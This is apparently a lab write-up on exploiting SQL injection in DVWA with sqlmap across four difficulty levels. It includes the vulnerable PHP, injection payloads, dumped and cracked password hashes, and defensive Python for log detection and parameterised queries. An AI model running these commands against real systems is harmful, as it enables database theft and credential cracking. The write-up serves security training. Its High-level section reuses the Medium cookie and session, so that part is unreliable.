
DVWA SQL Injection Lab
Completing the DVWA SQL injection lab with sqlmap
Normal function
Enter an id to look up the user name that corresponds to it

How to determine the type of SQL injection
Determine whether the injection point is numeric or string-based
Numeric
$id = $_GET['content'];
select * from users where id=1
String
$id = $_GET['content'];
select * from users where id='admin'
Low difficulty
Code analysis
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];
    // Check database
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last = $row["last_name"];
        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
The code above applies no filtering to the input: whatever we submit is passed straight into $id and concatenated into the query, so the input itself is where to work:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
Finding the injection point
Because DVWA requires a username/password login by default, we need --cookie to carry the logged-in session (the security level and PHPSESSID) and then run the scan to test for injection.
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37"
The injection points sqlmap identified are as follows:
sqlmap identified the following injection point(s) with a total of 150 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=2' OR NOT 4391=4391#&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(8715=8715,1))),0x716a6a7871),8715)-- ZTFh&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 7666 FROM (SELECT(SLEEP(5)))rSxl)-- MbUf&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=2' UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x6359625a4c596e436c4e65415a5869486d727048546d4748475467474b7355467a4b4f4946556979,0x716a6a7871)#&Submit=Submit
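The four payload families sqlmap reported above leave distinctive traces in a web server's access log. As an added example that is not part of the original write-up, the Python below classifies constructed Apache-style log lines carrying URL-encoded versions of those payloads; the signatures are assumptions tuned to the payloads shown here, not production-grade rules.

```python
import re
from urllib.parse import unquote_plus

# One signature per technique sqlmap reported above (assumption: patterns are
# chosen to match the payloads in this write-up; real rules need tuning).
SIGNATURES = {
    "union":       re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
    "time-based":  re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "boolean":     re.compile(r"\b(OR|AND)\s+(NOT\s+)?\d+\s*=\s*\d+", re.I),
}

def classify(log_line: str) -> list:
    # Decode the request target once, then test every signature; a single
    # request can carry several techniques, so all matches are returned.
    decoded = unquote_plus(log_line)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

# Constructed Apache-style lines: a benign lookup followed by the boolean,
# time-based and (shortened) UNION payloads from the Low-level output.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2021:11:26:47 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [30/Mar/2021:11:26:48 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20OR%20NOT%204391%3D4391%23&Submit=Submit HTTP/1.1" 200 4100
10.0.0.5 - - [30/Mar/2021:11:26:49 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20AND%20%28SELECT%207666%20FROM%20%28SELECT%28SLEEP%285%29%29%29rSxl%29--%20MbUf&Submit=Submit HTTP/1.1" 200 4100
10.0.0.5 - - [30/Mar/2021:11:26:50 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4500
"""

def scan(log_text: str) -> list:
    # Returns (line number, techniques) for every line matching a signature.
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        techniques = classify(line)
        if techniques:
            hits.append((n, techniques))
    return hits

if __name__ == "__main__":
    for n, techniques in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(techniques)}")
```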
Enumerating databases
List which databases exist
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --dbs
The databases found are:
[11:28:06] [INFO] fetching database names
[11:28:06] [WARNING] reflective value(s) found and filtering out
available databases [3]:
[*] dvwa
[*] information_schema
[*] test
Enumerating tables
List the tables in the dvwa database
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa --tables
Two tables are found: guestbook and users
[11:43:31] [INFO] fetching tables for database: 'dvwa'
[11:43:31] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
Enumerating a table's columns
List the columns of the users table
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns
Each column's name and its data type are shown
[13:37:44] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+
Viewing the values of specific columns in a table
View the values of the username and password fields of the users table in the dvwa database
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=pimuhjh6udoe422658b7dl0g37" -D dvwa -T users --columns user,password -dump
sqlmap cracks simple MD5 hashes automatically, which makes this a very convenient way to recover user passwords with no need for an online MD5 lookup service.
do you want to use common password suffixes? (slow!) [y/N]
[13:47:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:47:22] [INFO] starting 8 processes
[13:47:23] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[13:47:24] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[13:47:26] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[13:47:27] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
Medium difficulty
Code analysis
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last = $row["last_name"];
        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
The code above uses the mysqli_real_escape_string function to escape special characters in the input, and the front-end page now uses a drop-down list, changing the previous GET request into a POST request.
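Escaping does not protect this query because $id is interpolated without surrounding quotes: a payload containing no quote characters passes through the escape function unchanged. The Python below is an added example rather than DVWA's code; it models mysqli_real_escape_string (assuming the seven-character escape set), builds the Medium and Low query strings, runs the Medium form against a constructed in-memory SQLite stand-in for the users table, and contrasts it with a bound parameter.

```python
import sqlite3

# Model of mysqli_real_escape_string (assumption: the seven characters MySQL
# backslash-escapes inside a quoted literal; enough to show the behaviour).
_ESCAPES = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
            "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}

def mysql_escape(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)

def build_medium_query(user_id: str) -> str:
    # DVWA Medium: escaped, but interpolated without quotes (numeric context),
    # so a payload containing no quote characters passes through untouched.
    return f"SELECT first_name, last_name FROM users WHERE user_id = {mysql_escape(user_id)};"

def build_low_query_escaped(user_id: str) -> str:
    # The same escaping would have neutralised the Low-level payload, because
    # there the value sits inside single quotes.
    return f"SELECT first_name, last_name FROM users WHERE user_id = '{mysql_escape(user_id)}';"

def make_demo_db() -> sqlite3.Connection:
    # Constructed stand-in for dvwa.users (names only, no password hashes).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me"),
                      (4, "Pablo", "Picasso"), (5, "Bob", "Smith")])
    return conn

def run_medium(conn: sqlite3.Connection, user_id: str) -> list:
    # Executes the Medium-style concatenated query (SQLite stands in for MySQL).
    return conn.execute(build_medium_query(user_id)).fetchall()

def run_parameterised(conn: sqlite3.Connection, user_id: str) -> list:
    # The fix: a bound parameter. The value travels separately from the SQL
    # text, so it can never change the statement's structure, quoted or not.
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_demo_db()
    print(build_medium_query("2 OR 1=1"))           # escaping changed nothing
    print(build_low_query_escaped("2' OR '1'='1"))  # quotes get backslash-escaped
    print(len(run_medium(db, "2 OR 1=1")))          # 5: every user is returned
    print(run_parameterised(db, "2 OR 1=1"))        # []: treated as a literal value
    print(run_parameterised(db, "2"))               # [('Gordon', 'Brown')]
```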
Lab procedure

Finding the injection point
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit"
Several different types of injection point are found:
[17:12:26] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---
Enumerating databases
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs
The databases extracted are dvwa, information_schema and test
[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test
Enumerating tables
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --tables -D "dvwa"
The tables extracted are guestbook and users
[17:24:40] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
Enumerating a table's columns
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users"
The columns of the users table:
[17:34:08] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+
Viewing the values of specific columns in a table
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump
View the values of user and password in the table
[17:35:25] [INFO] fetching columns for table 'users' in database 'dvwa'
[17:35:25] [INFO] fetching entries for table 'users' in database 'dvwa'
[17:35:25] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] \
do you want to crack them via a dictionary-based attack? [Y/n/q]
[17:35:29] [INFO] using hash method 'md5_generic_passwd'
[17:35:29] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[17:35:29] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[17:35:29] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[17:35:29] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
High difficulty
Code analysis
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];
    // Check database
    $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last = $row["last_name"];
        // Feedback for end user
        $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
At High difficulty the input is submitted through a separate session-input.php entry point and then passed on to the original page. This defeats an ordinary sqlmap run to some extent, but sqlmap is still powerful enough: raising the --level gets past it.
Finding the injection point
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2
Several different types of injection point are found:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (8328=8328) THEN 2 ELSE (SELECT 4432 UNION SELECT 9630) END))&Submit=Submit
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=2 AND GTID_SUBSET(CONCAT(0x717a6a7171,(SELECT (ELT(1202=1202,1))),0x716a6a7871),1202)&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2 AND (SELECT 2862 FROM (SELECT(SLEEP(5)))gLnf)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=2 UNION ALL SELECT CONCAT(0x717a6a7171,0x55506e6a56597642546f5571454645716847774e5158616e557766706342496b4a7a676f45486173,0x716a6a7871),NULL-- -&Submit=Submit
---
Enumerating databases
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" -dbs
The databases extracted are dvwa, information_schema and test
[17:14:43] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test
Enumerating tables
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --level=2 -dbs
The tables extracted are guestbook and users
[21:50:18] [INFO] fetching database names
available databases [3]:
[*] dvwa
[*] information_schema
[*] test
Enumerating a table's columns
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" --level=2
The columns of the users table:
[21:51:52] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| user | varchar(15) |
| avatar | varchar(70) |
| failed_login | int(3) |
| first_name | varchar(15) |
| last_login | timestamp |
| last_name | varchar(15) |
| password | varchar(32) |
| user_id | int(6) |
+--------------+-------------+
Viewing the values of specific columns in a table
sqlmap -u "http://192.168.47.129/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=pimuhjh6udoe422658b7dl0g37" --data "id=2&Submit=Submit" --columns -D "dvwa" -T "users" user,password -dump --level=2
View the values of user and password in the table
Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2021-03-30 11:26:47 | 0 |
| 2 | gordonb | /dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2021-03-30 11:26:47 | 0 |
| 3 | 1337 | /dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2021-03-30 11:26:47 | 0 |
| 4 | pablo | /dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2021-03-30 11:26:47 | 0 |
| 5 | smithy | /dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2021-03-30 11:26:47 | 0 |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
Impossible difficulty
Code analysis
<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Get input
    $id = $_GET[ 'id' ];
    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();
        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last = $row[ 'last_name' ];
            // Feedback for end user
            $html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>
The code above continues to use PDO (a prepared statement with a bound parameter) and additionally validates a user_token to prevent CSRF attacks.